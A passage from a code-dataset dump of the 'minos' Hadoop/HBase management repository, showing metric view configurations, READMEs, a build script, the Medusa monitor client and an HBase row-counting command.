'RpcProcessingTimeNumOps', 'op(s)')],\n [('HBase', 'RpcProcessingTimeAvgTime', 'us(s)')],\n [('HBase', 'RpcSlowResponseNumOps', 'op(s)')],\n [('HBase', 'RpcSlowResponseAvgTime', 'ms(s)')],\n ]),\n ('Store', [\n [('RegionServer', 'regions', 'region(s)')],\n [('RegionServer', 'memstoreSizeMB', 'MB')],\n [('RegionServer', 'storefileIndexSizeMB', 'MB')],\n [('RegionServer', 'storeFileSizeMB', 'MB')],\n [('RegionServer', 'storefiles', 'file(s)')],\n [('RegionServer', 'stores', 'store(s)')],\n [('RegionServer', 'largeCompactionQueueSize', 'count(s)')],\n [('RegionServer', 'smallCompactionQueueSize', 'count(s)')],\n [('RegionServer', 'compactionTime', 'ms(s)')],\n [('RegionServer', 'compactionSize', 'byte(s)')],\n [('RegionServer', 'flushQueueSize', 'count(s)')],\n [('RegionServer', 'flushTime', 'second(s)')],\n [('RegionServer', 'flushSize', 'byte(s)')],\n [('RegionServer', 'hlogRollCount', 'count(s)')],\n [('RegionServer', 'hlogFileCount', 'num')],\n [('RegionServer', 'hlogFileSizeMB', 'MB')],\n ]),\n ('BlockCache', [\n [('RegionServer', 'blockCacheCount', 'count(s)')],\n [('RegionServer', 'blockCacheFree', 'byte(s)')],\n [('RegionServer', 'blockCacheHitRatio', '%')],\n [('RegionServer', 'blockCacheHitCount', 'count(s)')],\n [('RegionServer', 'blockCacheMissCount', 'count(s)')],\n [('RegionServer', 'blockCacheSize', 'byte(s)' )],\n ]),\n ('FileSystem', [\n [('RegionServer', 'fsReadLatencyNumOps', 'op(s)')],\n [('RegionServer', 'fsReadLatencyAvgTime', 'ms(s)')],\n [('RegionServer', 'fsPreadLatencyNumOps', 'op(s)')],\n [('RegionServer', 'fsPreadLatencyAvgTime', 'ms(s)')],\n [('RegionServer', 'fsWriteLatencyNumOps', 'op(s)')],\n [('RegionServer', 'fsWriteLatencyAvgTime', 'ms(s)')],\n [('RegionServer', 'fsSyncLatencyNumOps', 'op(s)')],\n [('RegionServer', 'fsSyncLatencyAvgTime', 'ms(s)')],\n ]),\n ('JvmStatistics', [\n [('RegionServer', 'memHeapCommittedM', 'MB')],\n [('RegionServer', 'fatalCount', 'count(s)')],\n [('RegionServer', 'threadsWaiting', 'thread(s)')],\n [('RegionServer', 'threadsBlocked', 'thread(s)')],\n [('RegionServer', 'gcCount', 'count(s)')],\n [('RegionServer', 'errorCount', 'count(s)')],\n [('RegionServer', 'memNonHeapCommittedM', 'MB')],\n [('RegionServer', 'warnCount', 'count(s)')],\n [('RegionServer', 'gcTimeMillis', 'ms(s)')],\n [('RegionServer', 'memNonHeapUsedM', 'MB')],\n [('RegionServer', 'memHeapUsedM', 'MB')],\n [('RegionServer', 'threadsNew', 'thread(s)')],\n [('RegionServer', 'threadsTerminated', 'thread(s)')],\n [('RegionServer', 'threadsTimedWaiting', 'thread(s)')],\n [('RegionServer', 'maxMemoryM', 'MB')],\n [('RegionServer', 'infoCount', 'count(s)')],\n [('RegionServer', 'threadsRunnable', 'thread(s)')],\n ]),\n ],\n }\n}\n\nJOB_METRICS_VIEW_CONFIG = {\n 'hdfs': {\n 'journalnode':[\n ('Rpc', [\n [('JournalNode', 'ReceivedBytes', 'byte(s)')],\n [('JournalNode', 'SentBytes', 'byte(s)')],\n [('JournalNode', 'RpcQueueTimeNumOps', 'req(s)')],\n [('JournalNode', 'RpcQueueTimeAvgTime', 'ms(s)')],\n ]),\n ],\n 'namenode':[\n # view\n ('Overall', [\n # graph\n [('NameNode', 'BlockCapacity', 'block(s)')],\n [('NameNode', 'BlocksTotal', 'block(s)')],\n [('NameNode', 'CapacityRemainingGB', 'GB')],\n [('NameNode', 'CapacityTotalGB', 'GB')],\n [('NameNode', 'CapacityUsedGB', 'GB')],\n [('NameNode', 'CorruptBlocks', 'block(s)')],\n [('NameNode', 'ExcessBlocks', 'block(s)')],\n [('NameNode', 'FilesTotal', 'file(s)')],\n ]),\n ('Operation', [\n [('NameNode', 'AddBlockOps', 'op(s)')],\n [('NameNode', 'CreateFileOps', 'op(s)')],\n [('NameNode', 'DeleteFileOps', 'op(s)')],\n [('NameNode', 'FileInfoOps', 'op(s)')],\n [('NameNode', 'GetListingOps', 'op(s)')],\n ]),\n ('Rpc', [\n [('NameNode', 'ReceivedBytes', 'byte(s)')],\n [('NameNode', 'SentBytes', 'byte(s)')],\n [('NameNode', 'RpcQueueTimeNumOps', 'op(s)')],\n [('NameNode', 'RpcQueueTimeAvgTime', 'ms(s)')],\n ]\n )\n ],\n 'datanode':[\n ('BlockOperation', [\n [('DataNode', 'BlockReportsAvgTime', 'ms(s)')],\n [('DataNode', 'BlockReportsNumOps', 'op(s)')],\n [('DataNode', 'BlocksGetLocalPathInfo', '')],\n [('DataNode', 'BlocksRead', 'block(s)')],\n [('DataNode', 'BlocksRemoved', 'block(s)')],\n [('DataNode', 'BlocksReplicated', 'block(s)')],\n [('DataNode', 'BlocksVerified', 'block(s)')],\n [('DataNode', 'BlocksWritten', 'block(s)')],\n ]),\n ('Activity', [\n [('DataNode', 'BytesWritten', '')],\n [('DataNode', 'BytesRead', '')],\n [('DataNode', 'BlocksWritten', '')],\n [('DataNode', 'BlocksRead', '')],\n [('DataNode', 'BlocksReplicated', '')],\n [('DataNode', 'BlocksRemoved', '')],\n [('DataNode', 'BlocksVerified', '')],\n [('DataNode', 'BlockVerificationFailures', '')],\n [('DataNode', 'ReadsFromLocalClient', '')],\n [('DataNode', 'ReadsFromRemoteClient', '')],\n [('DataNode', 'WritesFromLocalClient', '')],\n [('DataNode', 'WritesFromRemoteClient', '')],\n [('DataNode', 'BlocksGetLocalPathInfo', '')],\n [('DataNode', 'FsyncCount', '')],\n [('DataNode', 'VolumeFailures', '')],\n [('DataNode', 'ReadBlockOpNumOps', '')],\n [('DataNode', 'ReadBlockOpAvgTime', '')],\n [('DataNode', 'WriteBlockOpNumOps', '')],\n [('DataNode', 'WriteBlockOpAvgTime', '')],\n [('DataNode', 'BlockChecksumOpNumOps', '')],\n [('DataNode', 'BlockChecksumOpAvgTime', '')],\n [('DataNode', 'CopyBlockOpNumOps', '')],\n [('DataNode', 'CopyBlockOpAvgTime', '')],\n [('DataNode', 'ReplaceBlockOpNumOps', '')],\n [('DataNode', 'ReplaceBlockOpAvgTime', '')],\n [('DataNode', 'HeartbeatsNumOps', '')],\n [('DataNode', 'HeartbeatsAvgTime', '')],\n [('DataNode', 'BlockReportsNumOps', '')],\n [('DataNode', 'BlockReportsAvgTime', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanosNumOps', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanosAvgTime', '')],\n [('DataNode', 'FlushNanosNumOps', '')],\n [('DataNode', 'FlushNanosAvgTime', '')],\n [('DataNode', 'FsyncNanosNumOps', '')],\n [('DataNode', 'FsyncNanosAvgTime', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanosNumOps', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanosAvgTime', '')],\n [('DataNode', 'SendDataPacketTransferNanosNumOps', '')],\n [('DataNode', 'SendDataPacketTransferNanosAvgTime', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos60sNumOps', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos60s50thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos60s75thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos60s90thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos60s95thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos60s99thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos300sNumOps', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos300s50thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos300s75thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos300s90thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos300s95thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos300s99thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos900sNumOps', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos900s50thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos900s75thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos900s90thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos900s95thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos900s99thPercentileLatency', '')],\n [('DataNode', 'FlushNanos60sNumOps', '')],\n [('DataNode', 'FlushNanos60s50thPercentileLatency', '')],\n [('DataNode', 'FlushNanos60s75thPercentileLatency', '')],\n [('DataNode', 'FlushNanos60s90thPercentileLatency', '')],\n [('DataNode', 'FlushNanos60s95thPercentileLatency', '')],\n [('DataNode', 'FlushNanos60s99thPercentileLatency', '')],\n [('DataNode', 'FlushNanos300sNumOps', '')],\n [('DataNode', 'FlushNanos300s50thPercentileLatency', '')],\n [('DataNode', 'FlushNanos300s75thPercentileLatency', '')],\n [('DataNode', 'FlushNanos300s90thPercentileLatency', '')],\n [('DataNode', 'FlushNanos300s95thPercentileLatency', '')],\n [('DataNode', 'FlushNanos300s99thPercentileLatency', '')],\n [('DataNode', 'FlushNanos900sNumOps', '')],\n [('DataNode', 'FlushNanos900s50thPercentileLatency', '')],\n [('DataNode', 'FlushNanos900s75thPercentileLatency', '')],\n [('DataNode', 'FlushNanos900s90thPercentileLatency', '')],\n [('DataNode', 'FlushNanos900s95thPercentileLatency', '')],\n [('DataNode', 'FlushNanos900s99thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos60sNumOps', '')],\n [('DataNode', 'FsyncNanos60s50thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos60s75thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos60s90thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos60s95thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos60s99thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos300sNumOps', '')],\n [('DataNode', 'FsyncNanos300s50thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos300s75thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos300s90thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos300s95thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos300s99thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos900sNumOps', '')],\n [('DataNode', 'FsyncNanos900s50thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos900s75thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos900s90thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos900s95thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos900s99thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos60sNumOps', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos60s50thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos60s75thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos60s90thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos60s95thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos60s99thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos300sNumOps', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos300s50thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos300s75thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos300s90thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos300s95thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos300s99thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos900sNumOps', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos900s50thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos900s75thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos900s90thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos900s95thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos900s99thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos60sNumOps', '')],\n [('DataNode', 'SendDataPacketTransferNanos60s50thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos60s75thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos60s90thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos60s95thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos60s99thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos300sNumOps', '')],\n [('DataNode', 'SendDataPacketTransferNanos300s50thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos300s75thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos300s90thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos300s95thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos300s99thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos900sNumOps', '')],\n [('DataNode', 'SendDataPacketTransferNanos900s50thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos900s75thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos900s90thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos900s95thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos900s99thPercentileLatency', '')],\n ]),\n ],\n },\n 'hbase' : {\n 'master':[\n ('Operation', [\n [('HBase', 'putNumOps', 'op(s)')],\n [('HBase', 'putAvgTime', 'us(s)')],\n [('HBase', 'checkAndPutNumOps', 'op(s)')],\n [('HBase', 'checkAndPutAvgTime', 'us(s)')],\n [('HBase', 'getNumOps', 'op(s)')],\n [('HBase', 'getAvgTime', 'us(s)')],\n [('HBase', 'deleteNumOps', 'op(s)')],\n [('HBase', 'deleteAvgTime', 'us(s)')],\n ]),\n ('RPC', [\n [('HBase', 'RpcQueueTimeNumOps', 'op(s)')],\n [('HBase', 'RpcQueueTimeAvgTime', 'ms(s)')],\n [('HBase', 'RpcProcessingTimeNumOps', 'op(s)')],\n [('HBase', 'RpcProcessingTimeAvgTime', 'us(s)')],\n [('HBase', 'RpcSlowResponseNumOps', 'op(s)')],\n [('HBase', 'RpcSlowResponseAvgTime', 'ms(s)')],\n ]),\n ('JvmStatistics', [\n [('Master', 'memHeapCommittedM', 'MB')],\n [('Master', 'fatalCount', 'count(s)')],\n [('Master', 'threadsWaiting', 'thread(s)')],\n [('Master', 'threadsBlocked', 'thread(s)')],\n [('Master', 'gcCount', 'count(s)')],\n [('Master', 'errorCount', 'count(s)')],\n [('Master', 'memNonHeapCommittedM', 'MB')],\n [('Master', 'warnCount', 'count(s)')],\n [('Master', 'gcTimeMillis', 'ms(s)')],\n [('Master', 'memNonHeapUsedM', 'MB')],\n [('Master', 'memHeapUsedM', 'MB')],\n [('Master', 'threadsNew', 'thread(s)')],\n [('Master', 'threadsTerminated', 'thread(s)')],\n [('Master', 'threadsTimedWaiting', 'thread(s)')],\n [('Master', 'maxMemoryM', 'MB')],\n [('Master', 'infoCount', 'count(s)')],\n [('Master', 'threadsRunnable', 'thread(s)')],\n ]),\n ],\n 'regionserver': [\n ('Operation', [\n [('HBase', 'multiNumOps', 'op(s)')],\n [('HBase', 'multiAvgTime', 'us(s)')],\n [('HBase', 'checkAndPutNumOps', 'op(s)')],\n [('HBase', 'checkAndPutAvgTime', 'us(s)')],\n [('HBase', 'getNumOps', 'op(s)')],\n [('HBase', 'getAvgTime', 'us(s)')],\n [('HBase', 'openScannerNumOps', 'op(s)')],\n [('HBase', 'openScannerAvgTime', 'us(s)')],\n [('HBase', 'nextNumOps', 'op(s)')],\n [('HBase', 'nextAvgTime', 'us(s)')],\n [('HBase', 'deleteNumOps', 'op(s)')],\n [('HBase', 'deleteAvgTime', 'us(s)')],\n ]),\n ('RPC', [\n [('HBase', 'RpcQueueTimeNumOps', 'op(s)')],\n [('HBase', 'RpcQueueTimeAvgTime', 'ms(s)')],\n [('HBase', 'RpcProcessingTimeNumOps', 'op(s)')],\n [('HBase', 'RpcProcessingTimeAvgTime', 'us(s)')],\n [('HBase', 'RpcSlowResponseNumOps', 'op(s)')],\n [('HBase', 'RpcSlowResponseAvgTime', 'ms(s)')],\n ]),\n ('Store', [\n [('RegionServer', 'regions', 'region(s)')],\n [('RegionServer', 'memstoreSizeMB', 'MB')],\n [('RegionServer', 'storefileIndexSizeMB', 'MB')],\n [('RegionServer', 'storeFileSizeMB', 'MB')],\n [('RegionServer', 'storefiles', 'file(s)')],\n [('RegionServer', 'stores', 'store(s)')],\n [('RegionServer', 'largeCompactionQueueSize', 'count(s)')],\n [('RegionServer', 'smallCompactionQueueSize', 'count(s)')],\n [('RegionServer', 'compactionTime', 'ms(s)')],\n [('RegionServer', 'compactionSize', 'byte(s)')],\n [('RegionServer', 'flushQueueSize', 'count(s)')],\n [('RegionServer', 'flushTime', 'second(s)')],\n [('RegionServer', 'flushSize', 'byte(s)')],\n [('RegionServer', 'hlogRollCount', 'count(s)')],\n ]),\n ('BlockCache', [\n [('RegionServer', 'blockCacheCount', 'count(s)')],\n [('RegionServer', 'blockCacheFree', 'byte(s)')],\n [('RegionServer', 'blockCacheHitRatio', '%')],\n [('RegionServer', 'blockCacheHitCount', 'count(s)')],\n [('RegionServer', 'blockCacheMissCount', 'count(s)')],\n [('RegionServer', 'blockCacheSize', 'byte(s)' )],\n ]),\n ('Replication', [\n [('Replication', 'sizeOfLogQueue-5', '')],\n [('Replication', 'ageOfLastShippedOp-5', '')],\n [('Replication', 'logEditsReadRate-5', '')],\n [('Replication', 'shippedOpsRate-5', '')],\n [('Replication', 'logEditsFilteredRate-5', '')],\n [('Replication', 'shippedBatchesRate-5', '')],\n ]),\n ('FileSystem', [\n [('RegionServer', 'fsReadLatencyNumOps', 'op(s)')],\n [('RegionServer', 'fsReadLatencyAvgTime', 'ms(s)')],\n [('RegionServer', 'fsPreadLatencyNumOps', 'op(s)')],\n [('RegionServer', 'fsPreadLatencyAvgTime', 'ms(s)')],\n [('RegionServer', 'fsWriteLatencyNumOps', 'op(s)')],\n [('RegionServer', 'fsWriteLatencyAvgTime', 'ms(s)')],\n [('RegionServer', 'fsSyncLatencyNumOps', 'op(s)')],\n [('RegionServer', 'fsSyncLatencyAvgTime', 'ms(s)')],\n ]),\n ('JvmStatistics', [\n [('RegionServer', 'memHeapCommittedM', 'MB')],\n [('RegionServer', 'fatalCount', 'count(s)')],\n [('RegionServer', 'threadsWaiting', 'thread(s)')],\n [('RegionServer', 'threadsBlocked', 'thread(s)')],\n [('RegionServer', 'gcCount', 'count(s)')],\n [('RegionServer', 'errorCount', 'count(s)')],\n [('RegionServer', 'memNonHeapCommittedM', 'MB')],\n [('RegionServer', 'warnCount', 'count(s)')],\n [('RegionServer', 'gcTimeMillis', 'ms(s)')],\n [('RegionServer', 'memNonHeapUsedM', 'MB')],\n [('RegionServer', 'memHeapUsedM', 'MB')],\n [('RegionServer', 'threadsNew', 'thread(s)')],\n [('RegionServer', 'threadsTerminated', 'thread(s)')],\n [('RegionServer', 'threadsTimedWaiting', 'thread(s)')],\n [('RegionServer', 'maxMemoryM', 'MB')],\n [('RegionServer', 'infoCount', 'count(s)')],\n [('RegionServer', 'threadsRunnable', 'thread(s)')],\n ]),\n ],\n }\n}\n\nDEFAULT_OPS_UNIT = \"op(s)\"\nDEFAULT_LATENCY_UNIT = \"us(s)\"\n\nREGION_SERVER_OPERATION_VIEW_CONFIG = ['multi', 'get', 'openScanner', 'next',\n 'delete', 'checkAndPut', 'execCoprocessor']\nREPLICATION_METRICS_VIEW_CONFIG = [('sizeOfLogQueue', 'count(s)'), ('ageOfLastShippedOp', 'ms(s)'),\n\t\t\t\t ('logEditsReadRate', 'op(s)'), ('shippedOpsRate', 'op(s)',),\n\t\t\t\t ('logEditsFilteredRate', 'op(s)'), ('shippedBatchesRate', 'op(s)'),\n ('logReadRateInByte', 'byte(s)')]\n"
},
{
"alpha_fraction": 0.7715617418289185,
"alphanum_fraction": 0.7715617418289185,
"avg_line_length": 60,
"blob_id": "c9f325baea664f18130913a156b8103b73d8841c",
"content_id": "29273acd01a2b695293859a780a72a435120c854",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 429,
"license_type": "permissive",
"max_line_length": 182,
"num_lines": 7,
"path": "/config/puppet/README.md",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "\n# Install puppet-master and puppet-client <http://puppetlabs.com/misc/download-options>\n\n# Pack the `supervisor` directory and put it under your puppet-master's module directory:\n\n ${puppet-master-root}/modules/supervisor/supervisor.tar.gz\n\n# Create the `packages_root`, `app_root`, `log_root` and `data_dirs` directories on the puppet-client machine according to the configuration items in `templates/supervisord.conf.erb`\n\n"
},
{
"alpha_fraction": 0.7652581930160522,
"alphanum_fraction": 0.7652581930160522,
"avg_line_length": 27.399999618530273,
"blob_id": "ed8c3333df6519a5f1e554f6059b5c3901a325fc",
"content_id": "fceb61202ef3761e64abdc8883d2e22bb169a353",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 426,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 15,
"path": "/build/build_client.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import os\n\nimport build_utils\n\nfrom minos_config import CLIENT_PREREQUISITE_PYTHON_LIBS\nfrom minos_config import Log\n\ndef build_client():\n # Check and install prerequisite python libraries\n Log.print_info(\"Check and install prerequisite python libraries\")\n build_utils.check_and_install_modules(CLIENT_PREREQUISITE_PYTHON_LIBS)\n Log.print_success(\"Build Minos client success\")\n\nif __name__ == '__main__':\n build_client()\n"
},
{
"alpha_fraction": 0.7716814279556274,
"alphanum_fraction": 0.7722713947296143,
"avg_line_length": 43.578948974609375,
"blob_id": "e3258b5c0e88f6e4ac00b76ce096a1d332c559fd",
"content_id": "8342867be696ef3788eacac1320265a72e785649",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1695,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 38,
"path": "/supervisor/supervisor/medusa/README.txt",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "Medusa is a 'server platform' -- it provides a framework for\nimplementing asynchronous socket-based servers (TCP/IP and on Unix,\nUnix domain, sockets).\n\nAn asynchronous socket server is a server that can communicate with many\nother clients simultaneously by multiplexing I/O within a single\nprocess/thread. In the context of an HTTP server, this means a single\nprocess can serve hundreds or even thousands of clients, depending only on\nthe operating system's configuration and limitations.\n\nThere are several advantages to this approach:\n \n o performance - no fork() or thread() start-up costs per hit.\n\n o scalability - the overhead per client can be kept rather small,\n on the order of several kilobytes of memory.\n\n o persistence - a single-process server can easily coordinate the\n actions of several different connections. This makes things like\n proxy servers and gateways easy to implement. It also makes it\n possible to share resources like database handles.\n\nMedusa includes HTTP, FTP, and 'monitor' (remote python interpreter)\nservers. Medusa can simultaneously support several instances of\neither the same or different server types - for example you could\nstart up two HTTP servers, an FTP server, and a monitor server. Then\nyou could connect to the monitor server to control and manipulate\nmedusa while it is running.\n\nOther servers and clients have been written (SMTP, POP3, NNTP), and\nseveral are in the planning stages. \n\nMedusa was originally written by Sam Rushing <[email protected]>,\nand its original Web page is at <http://www.nightmare.com/medusa/>. After\nSam moved on to other things, A.M. Kuchling <[email protected]> \ntook over maintenance of the Medusa package.\n\n--amk\n\n"
},
{
"alpha_fraction": 0.5440242290496826,
"alphanum_fraction": 0.5527988076210022,
"avg_line_length": 25.869918823242188,
"blob_id": "dd61e11437ab46c0f5fc5fee1edff232c4dc39ec",
"content_id": "fabcc6a7cc363382a258489a83518b4d3db83af3",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3305,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 123,
"path": "/supervisor/supervisor/medusa/monitor_client.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\n# monitor client, unix version.\n\nimport asyncore_25 as asyncore\nimport asynchat_25 as asynchat\nimport socket\nimport string\nimport sys\nimport os\n\nimport md5\n\nclass stdin_channel (asyncore.file_dispatcher):\n def handle_read (self):\n data = self.recv(512)\n if not data:\n print '\\nclosed.'\n self.sock_channel.close()\n try:\n self.close()\n except:\n pass\n\n data = string.replace(data, '\\n', '\\r\\n')\n self.sock_channel.push (data)\n\n def writable (self):\n return 0\n\n def log (self, *ignore):\n pass\n\nclass monitor_client (asynchat.async_chat):\n def __init__ (self, password, addr=('',8023), socket_type=socket.AF_INET):\n asynchat.async_chat.__init__ (self)\n self.create_socket (socket_type, socket.SOCK_STREAM)\n self.terminator = '\\r\\n'\n self.connect (addr)\n self.sent_auth = 0\n self.timestamp = ''\n self.password = password\n\n def collect_incoming_data (self, data):\n if not self.sent_auth:\n self.timestamp = self.timestamp + data\n else:\n sys.stdout.write (data)\n sys.stdout.flush()\n\n def found_terminator (self):\n if not self.sent_auth:\n self.push (hex_digest (self.timestamp + self.password) + '\\r\\n')\n self.sent_auth = 1\n else:\n print\n\n def handle_close (self):\n # close all the channels, which will make the standard main\n # loop exit.\n map (lambda x: x.close(), asyncore.socket_map.values())\n\n def log (self, *ignore):\n pass\n\nclass encrypted_monitor_client (monitor_client):\n \"Wrap push() and recv() with a stream cipher\"\n\n def init_cipher (self, cipher, key):\n self.outgoing = cipher.new (key)\n self.incoming = cipher.new (key)\n\n def push (self, data):\n # push the encrypted data instead\n return monitor_client.push (self, self.outgoing.encrypt (data))\n\n def recv (self, block_size):\n data = monitor_client.recv (self, block_size)\n if data:\n return self.incoming.decrypt (data)\n else:\n return data\n\ndef hex_digest (s):\n m = md5.md5()\n m.update (s)\n return string.join (\n map (lambda x: hex (ord (x))[2:], map (None, m.digest())),\n '',\n )\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n print 'Usage: %s host port' % sys.argv[0]\n sys.exit(0)\n\n if ('-e' in sys.argv):\n encrypt = 1\n sys.argv.remove ('-e')\n else:\n encrypt = 0\n\n sys.stderr.write ('Enter Password: ')\n sys.stderr.flush()\n try:\n os.system ('stty -echo')\n p = raw_input()\n print\n finally:\n os.system ('stty echo')\n stdin = stdin_channel (0)\n if len(sys.argv) > 1:\n if encrypt:\n client = encrypted_monitor_client (p, (sys.argv[1], string.atoi (sys.argv[2])))\n import sapphire\n client.init_cipher (sapphire, p)\n else:\n client = monitor_client (p, (sys.argv[1], string.atoi (sys.argv[2])))\n else:\n # default to local host, 'standard' port\n client = monitor_client (p)\n stdin.sock_channel = client\n asyncore.loop()\n"
},
{
"alpha_fraction": 0.647023618221283,
"alphanum_fraction": 0.6539036631584167,
"avg_line_length": 35.28260803222656,
"blob_id": "479117e0dd03b3fc88891e63719a6909186b4bc2",
"content_id": "c549c72c73dceb3708aa6bdecafb002f4c1a0384",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3343,
"license_type": "permissive",
"max_line_length": 178,
"num_lines": 92,
"path": "/owl/monitor/management/commands/count_rows.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nimport subprocess\nimport re\nimport time\nimport datetime\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\n\nfrom monitor.models import Table\n\nlogger = logging.getLogger(__name__)\n\n# Count rows of HBase tables\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n\n count_period = settings.COUNT_PERIOD\n count_start_hour = settings.COUNT_START_HOUR\n count_end_hour = settings.COUNT_END_HOUR\n logger.info(\"Count rows from \" + str(count_start_hour) + \" to \" + str(count_end_hour) + \" every \" + str(count_period) + \" days\")\n \n # Wait to next day to count\n self.wait_to_next_day(count_start_hour)\n\n while True:\n period_start_time = datetime.datetime.now()\n\n # Get tables from database\n tables = Table.objects.filter(is_count_rows=True)\n\n # Count rows of tables one by one\n for table in tables:\n table_name = table.name\n cluster_name = table.cluster.name\n\n count = self.count_rows(cluster_name, table_name)\n\n # Insert result into database\n if count == -1:\n logger.info(\"Count error, will not update the database\")\n else:\n table.rows = count\n table.last_update_time = datetime.datetime.now()\n table.save()\n logger.info(\"Save the new rows \" + table.rows + \" in database\")\n\n # Continue or pause\n if datetime.datetime.now().hour >= count_end_hour:\n logger.info(\"Pause and wait to next day to count other tables\")\n self.wait_to_next_day(count_start_hour)\n\n # Sleep for next period\n next_start_time = period_start_time + datetime.timedelta(days=count_period)\n sleep_time = (next_start_time - datetime.datetime.now()).total_seconds()\n\n logger.info(\"This period is finished. Sleep \" + str(sleep_time) + \" seconds for next period\")\n time.sleep(sleep_time)\n\n def wait_to_next_day(self, hour):\n logger.info(\"Will wait to next day's \" + str(hour) + \" o'clock\" )\n\n now = datetime.datetime.now()\n next_day = datetime.datetime(now.year, now.month, 